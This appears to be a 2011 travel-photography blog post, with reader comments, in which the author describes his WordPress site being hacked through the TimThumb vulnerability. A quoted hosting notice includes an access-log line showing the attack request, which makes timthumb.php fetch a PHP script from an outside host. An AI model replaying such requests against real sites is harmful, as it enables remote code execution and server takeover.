The Trip Overland Hacked via the Timthumb Vulnerability

(Manny Santiago)

On the road there is little time for anything other than catching glimpses out of the corner of your eye along the speeding road of the blurred trees and the slower moving mountains at the far-off horizon line. There isn’t an opportunity to jack in, hook up, dose out online. When you are working out on the road and your only Wi-Fi connection is still 500 miles away in the next Motel 6, how do you protect yourself? A better, more wider ranging question might be: how do you keep what you put out into the world safe from those who would do harm?

After getting back from a summer trip to New Orleans, I got a job in Northern California and was off the grid, so to speak, for a few day, camping, kayaking and shooting long exposures of stars at night. Getting back to reality I received the following message from my hosting company:

We need to inform you that your hosting account for willwalkforsex.com has been hacked and used to run illegal software on the server. Here is how the hackers have exploited your account:

87.118.92.112 – - [17/Aug/2011:08:43:18 -0400] “GET /wp-content/themes/xxxxxxxxx/includes/timthumb.php?src=http://flickr.com.wikicenter.net/php/echo.g.php HTTP/1.1″ 200 827 “http://www.enchantedhillsweddings.com/wp-content/themes/DeepFocus/timthumb.php?src=http://flickr.com.wikicenter.net/php/echo.g.php” “Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.8) Gecko/20071008 Firefox/2.0.0.8″

To secure your website, and to avoid similar incidents in future, you will have to upgrade any third party software you are using on your account to the latest versions. Also, if you are using any custom scripts, please secure them as soon as possible.

Here is a full rundown of the timthumb vulnerability.

I had always assumed that hacker’s wouldn’t (or shouldn’t rather) be interested in sites like mine. Why would they? Is there any reason for them to use this site other than as gateway protection to buffer them from their real target? Their real target being offshore holdings of some monolithic corporation or secret plans housed in an underground government facility. Why The Trip Overland? [shakes fist at sky whilst muttering, "I'll get you yet!"]

Anyway, apologies for the downtime (those of you who actually noticed!). We’re back up and running at at least 68%. More to come.

The Berkeley Sky at Night (Manny Santiago)

The Berkeley Sky at Night

This entry was posted on Monday, September 19th, 2011 at 06:41. It is filed under The Trip, U.S.A. and tagged with , , , , , , , , , . You can follow any responses to this entry through the RSS 2.0 feed.

  • http://www.shadowgraphy.org Longwei

    good you are back, I would say this is just random bad luck…or the random price to pay for not using self made code…
    by the way, last picture is great !

  • http://sugardisaster.com/wharehouse Manny Santiago

    Thanks, and you are correct about bad luck and possibly the handmade coding, but as you may well know, it’s difficult to do all the coding while being outside to shoot, then scan, then upload, then edit, then…Listening to the Prairie Home Companion yesterday I heard a story about a writer who had nothing to write about because he spent all his time trying to write, rather than being out gaining experience to write about…Maybe a good balance is the best answer. So now I will put some security in place. Thanks again!

  • http://blog.50mm.jp motionid

    More the point, great photo!

  • http://sugardisaster.com/wharehouse Manny Santiago

    Thanks MID…It’s tough for me to drive with two hands when there’s so much happening outside…